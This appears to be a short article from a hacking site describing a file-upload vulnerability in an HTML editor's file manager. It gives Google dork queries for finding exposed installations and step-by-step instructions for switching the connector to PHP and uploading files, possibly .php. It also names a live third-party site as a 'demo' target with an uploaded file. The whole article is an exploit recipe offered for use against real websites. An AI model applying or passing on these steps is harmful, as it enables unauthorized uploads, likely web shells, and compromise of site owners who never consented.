Main » Articles » Web Hacking » Exploits and Vulenrablities |
Html editor File Upload vulnerability
Google Dork : inurl:/HTMLEditor/editor/
or "inurl:/HTMLEditor/editor//filemanager/" or "inurl:/HTMLEditor/editor//filemanager//connectors/" Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html Go here : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html chnage connectors into PhP (Like FCKeditor) and upload Your file suppoted files : .TXT and .JPG in some site you can upload .html and .php too to view you file goto : http://website/PowerCMS%20folder/files/your file here or http://website/patch//PowerCMS%20folder/files/your file here Live Demo : http://www.madhouse1.com/clients/dna/cms/HTMLEditor/editor/filemanager/connectors/uploadtest.html http://www.madhouse1.com/PowerCMS%20folder/files/aaaaaaaa.txt | |
Views: 1052 | Comments: 9 | Rating: 2.5/2 |
Total comments: 0 | |